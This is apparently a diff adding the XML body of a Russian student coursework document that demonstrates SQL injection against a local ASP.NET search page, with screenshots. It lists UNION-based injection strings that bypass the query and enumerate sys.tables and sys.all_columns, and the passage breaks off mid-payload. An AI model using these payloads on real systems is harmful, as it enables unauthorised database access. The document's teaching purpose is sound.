+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Пример этого запроса </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>для поиска точно по слову и частично</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1' and '1' = '2' union select 1,'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ничего</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>','</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ничего</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>',1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>%') and '1' = '2' union select 1,'Ничего', 'Ничего',1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Он не выдал никаких ошибок и вывел нужные нам данные.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3018349" cy="2070457"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Рисунок 4" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx6 - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx6 - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3023161" cy="2073758"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3083917" cy="2067339"/>
+            <wp:effectExtent l="19050" t="0" r="2183" b="0"/>
+            <wp:docPr id="5" name="Рисунок 5" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx7 - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx7 - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3085336" cy="2068290"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Далее мы выводим все </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>табоицы</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, созданные администратором</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> с помощью</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> одного из </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>следующих</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> запрос</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ов</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>%')</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>and '1' = '2' union select 1, name, '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ничего</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">',1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">1' and '1' = '2' union select 1, name, 'Ничего',1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2902226" cy="2218003"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="7" name="Рисунок 7" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx8 - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx8 - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2905415" cy="2220440"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3047889" cy="2361537"/>
+            <wp:effectExtent l="19050" t="0" r="111" b="0"/>
+            <wp:docPr id="8" name="Рисунок 8" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx10 - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 8" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx10 - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3051552" cy="2364375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Можно вывести все таблицы и соответствующие им колонки при помощи одного из следующих запросов:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%') and '1' = '2' union select 1, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nametable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, name, 1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sys.all_columns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, (select name as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nametable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
